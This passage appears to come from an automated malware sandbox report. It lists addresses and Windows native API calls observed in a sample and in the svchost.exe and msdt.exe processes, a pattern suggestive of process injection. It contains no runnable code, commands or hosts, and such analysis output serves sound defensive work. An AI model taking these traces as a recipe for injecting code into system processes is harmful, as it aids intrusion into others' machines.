Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572AD0 NtReadFile,	2_2_03572AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572AF0 NtWriteFile,	2_2_03572AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572AB0 NtWaitForSingleObject,	2_2_03572AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572F60 NtCreateProcessEx,	2_2_03572F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572F30 NtCreateSection,	2_2_03572F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572FE0 NtCreateFile,	2_2_03572FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572F90 NtProtectVirtualMemory,	2_2_03572F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572FB0 NtResumeThread,	2_2_03572FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572FA0 NtQuerySection,	2_2_03572FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572E30 NtWriteVirtualMemory,	2_2_03572E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572EE0 NtQueueApcThread,	2_2_03572EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572E80 NtReadVirtualMemory,	2_2_03572E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572EA0 NtAdjustPrivilegesToken,	2_2_03572EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572D10 NtMapViewOfSection,	2_2_03572D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572D00 NtSetInformationFile,	2_2_03572D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572D30 NtUnmapViewOfSection,	2_2_03572D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572DD0 NtDelayExecution,	2_2_03572DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572DB0 NtEnumerateKey,	2_2_03572DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572C70 NtFreeVirtualMemory,	2_2_03572C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572C60 NtCreateKey,	2_2_03572C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572C00 NtQueryInformationProcess,	2_2_03572C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572CC0 NtQueryVirtualMemory,	2_2_03572CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572CF0 NtOpenProcess,	2_2_03572CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572CA0 NtQueryInformationToken,	2_2_03572CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03573010 NtOpenDirectoryObject,	2_2_03573010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03573090 NtSetValueKey,	2_2_03573090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035739B0 NtGetContextThread,	2_2_035739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03573D70 NtOpenThread,	2_2_03573D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03573D10 NtOpenProcessToken,	2_2_03573D10
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F4650 NtSuspendThread,LdrInitializeThunk,	5_2_044F4650
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F4340 NtSetContextThread,LdrInitializeThunk,	5_2_044F4340
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2C60 NtCreateKey,LdrInitializeThunk,	5_2_044F2C60
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_044F2C70
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_044F2CA0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_044F2D10
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_044F2D30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2DD0 NtDelayExecution,LdrInitializeThunk,	5_2_044F2DD0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_044F2DF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_044F2EE0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_044F2E80
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2F30 NtCreateSection,LdrInitializeThunk,	5_2_044F2F30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2FE0 NtCreateFile,LdrInitializeThunk,	5_2_044F2FE0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2FB0 NtResumeThread,LdrInitializeThunk,	5_2_044F2FB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2AD0 NtReadFile,LdrInitializeThunk,	5_2_044F2AD0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2AF0 NtWriteFile,LdrInitializeThunk,	5_2_044F2AF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2B60 NtClose,LdrInitializeThunk,	5_2_044F2B60
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2BE0 NtQueryValueKey,LdrInitializeThunk,	5_2_044F2BE0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_044F2BF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2BA0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_044F2BA0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F35C0 NtCreateMutant,LdrInitializeThunk,	5_2_044F35C0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F39B0 NtGetContextThread,LdrInitializeThunk,	5_2_044F39B0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2C00 NtQueryInformationProcess,	5_2_044F2C00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2CC0 NtQueryVirtualMemory,	5_2_044F2CC0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2CF0 NtOpenProcess,	5_2_044F2CF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2D00 NtSetInformationFile,	5_2_044F2D00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2DB0 NtEnumerateKey,	5_2_044F2DB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2E30 NtWriteVirtualMemory,	5_2_044F2E30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2EA0 NtAdjustPrivilegesToken,	5_2_044F2EA0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2F60 NtCreateProcessEx,	5_2_044F2F60
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2F90 NtProtectVirtualMemory,	5_2_044F2F90
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2FA0 NtQuerySection,	5_2_044F2FA0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2AB0 NtWaitForSingleObject,	5_2_044F2AB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F2B80 NtQueryInformationFile,	5_2_044F2B80
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F3010 NtOpenDirectoryObject,	5_2_044F3010
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F3090 NtSetValueKey,	5_2_044F3090
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F3D70 NtOpenThread,	5_2_044F3D70
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F3D10 NtOpenProcessToken,	5_2_044F3D10
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001D92D0 NtCreateFile,	5_2_001D92D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001D9440 NtReadFile,	5_2_001D9440
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001D9530 NtDeleteFile,	5_2_001D9530
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001D95E0 NtClose,	5_2_001D95E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001D9740 NtAllocateVirtualMemory,	5_2_001D9740

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C3A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00C3A1EF

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C28310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00C28310

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C351BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00C351BD

Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BDE6A0	0_2_00BDE6A0
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BFD975	0_2_00BFD975
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BDFCE0	0_2_00BDFCE0
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BF21C5	0_2_00BF21C5
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C062D2	0_2_00C062D2
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C503DA	0_2_00C503DA
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C0242E	0_2_00C0242E
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BF25FA	0_2_00BF25FA
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BE66E1	0_2_00BE66E1
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C2E616	0_2_00C2E616
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C0878F	0_2_00C0878F
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C38889	0_2_00C38889
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C06844	0_2_00C06844
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C50857	0_2_00C50857
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BE8808	0_2_00BE8808
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BFCB21	0_2_00BFCB21
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C06DB6	0_2_00C06DB6
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BE6F9E	0_2_00BE6F9E
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BE3030	0_2_00BE3030
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BF3187	0_2_00BF3187
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BFF1D9	0_2_00BFF1D9
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BD1287	0_2_00BD1287
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BF1484	0_2_00BF1484
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BE5520	0_2_00BE5520
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BF7696	0_2_00BF7696
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BE5760	0_2_00BE5760
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BF1978	0_2_00BF1978
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C09AB5	0_2_00C09AB5
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BFBDA6	0_2_00BFBDA6
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C57DDB	0_2_00C57DDB
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BF1D90	0_2_00BF1D90
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BE3FE0	0_2_00BE3FE0
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BDDF00	0_2_00BDDF00
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_01819151	0_2_01819151
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_0181901F	0_2_0181901F
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_0181CA20	0_2_0181CA20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004185A3	2_2_004185A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E043	2_2_0040E043
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410063	2_2_00410063
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E1DC	2_2_0040E1DC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E187	2_2_0040E187
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E193	2_2_0040E193
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401240	2_2_00401240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042EBE3	2_2_0042EBE3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401540	2_2_00401540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D80	2_2_00402D80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FE43	2_2_0040FE43
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FE3A	2_2_0040FE3A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004167B3	2_2_004167B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FA352	2_2_035FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036003E6	2_2_036003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E3F0	2_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C02C0	2_2_035C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C8158	2_2_035C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530100	2_2_03530100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F81CC	2_2_035F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036001AA	2_2_036001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F41A2	2_2_035F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03564750	2_2_03564750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353C7C0	2_2_0353C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355C6E0	2_2_0355C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03600591	2_2_03600591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F2446	2_2_035F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4420	2_2_035E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EE4F6	2_2_035EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FAB40	2_2_035FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F6BD7	2_2_035F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03556962	2_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360A9A6	2_2_0360A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354A840	2_2_0354A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03542840	2_2_03542840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E8F0	2_2_0356E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035268B8	2_2_035268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B4F40	2_2_035B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03560F30	2_2_03560F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E2F30	2_2_035E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03582F28	2_2_03582F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03532FC8	2_2_03532FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354CFE0	2_2_0354CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BEFA0	2_2_035BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540E59	2_2_03540E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FEE26	2_2_035FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FEEDB	2_2_035FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03552E90	2_2_03552E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FCE93	2_2_035FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DCD1F	2_2_035DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354AD00	2_2_0354AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353ADE0	2_2_0353ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03558DBF	2_2_03558DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540C00	2_2_03540C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530CF2	2_2_03530CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0CB5	2_2_035E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352D34C	2_2_0352D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F132D	2_2_035F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0358739A	2_2_0358739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355B2C0	2_2_0355B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E12ED	2_2_035E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035452A0	2_2_035452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360B16B	2_2_0360B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352F172	2_2_0352F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357516C	2_2_0357516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354B1B0	2_2_0354B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EF0CC	2_2_035EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035470C0	2_2_035470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F70E9	2_2_035F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FF0E0	2_2_035FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FF7B0	2_2_035FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03585630	2_2_03585630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F16CC	2_2_035F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F7571	2_2_035F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036095C3	2_2_036095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DD5B0	2_2_035DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03531460	2_2_03531460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FF43F	2_2_035FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFB76	2_2_035FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B5BF0	2_2_035B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357DBF9	2_2_0357DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355FB80	2_2_0355FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFA49	2_2_035FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F7A46	2_2_035F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B3A6C	2_2_035B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EDAC6	2_2_035EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DDAAC	2_2_035DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03585AA0	2_2_03585AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E1AA3	2_2_035E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03549950	2_2_03549950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355B950	2_2_0355B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D5910	2_2_035D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AD800	2_2_035AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035438E0	2_2_035438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFF09	2_2_035FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03503FD2	2_2_03503FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03503FD5	2_2_03503FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03541F92	2_2_03541F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFFB1	2_2_035FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03549EB0	2_2_03549EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F1D5A	2_2_035F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03543D40	2_2_03543D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F7D73	2_2_035F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355FDC0	2_2_0355FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B9C32	2_2_035B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFCF2	2_2_035FFCF2
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Code function: 4_2_02F96AFB	4_2_02F96AFB
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Code function: 4_2_02F9F202	4_2_02F9F202
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Code function: 4_2_02F96B04	4_2_02F96B04
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Code function: 4_2_02FB58A4	4_2_02FB58A4
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Code function: 4_2_02F94E9D	4_2_02F94E9D
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Code function: 4_2_02F94E54	4_2_02F94E54
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Code function: 4_2_02F94E41	4_2_02F94E41
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Code function: 4_2_02F9D474	4_2_02F9D474
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Code function: 4_2_02F96D24	4_2_02F96D24
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04572446	5_2_04572446
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04564420	5_2_04564420
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0456E4F6	5_2_0456E4F6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044C0535	5_2_044C0535
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04580591	5_2_04580591
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044DC6E0	5_2_044DC6E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044E4750	5_2_044E4750
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044C0770	5_2_044C0770
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044BC7C0	5_2_044BC7C0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04552000	5_2_04552000
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04548158	5_2_04548158
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044B0100	5_2_044B0100
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0455A118	5_2_0455A118
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_045781CC	5_2_045781CC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_045801AA	5_2_045801AA
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_045741A2	5_2_045741A2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04560274	5_2_04560274
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_045402C0	5_2_045402C0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0457A352	5_2_0457A352
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044CE3F0	5_2_044CE3F0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_045803E6	5_2_045803E6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044C0C00	5_2_044C0C00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044B0CF2	5_2_044B0CF2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04560CB5	5_2_04560CB5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0455CD1F	5_2_0455CD1F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044CAD00	5_2_044CAD00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044BADE0	5_2_044BADE0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044D8DBF	5_2_044D8DBF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044C0E59	5_2_044C0E59
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0457EE26	5_2_0457EE26
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0457EEDB	5_2_0457EEDB
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0457CE93	5_2_0457CE93
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044D2E90	5_2_044D2E90
